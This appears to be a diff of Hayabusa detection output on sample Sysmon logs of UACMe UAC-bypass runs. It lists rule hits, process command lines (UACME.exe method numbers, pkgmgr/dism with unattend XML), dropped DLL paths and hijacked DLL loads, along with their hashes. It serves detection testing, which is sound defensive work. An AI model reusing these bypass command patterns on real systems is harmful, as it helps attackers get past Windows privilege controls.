+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,../hayabusa-rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
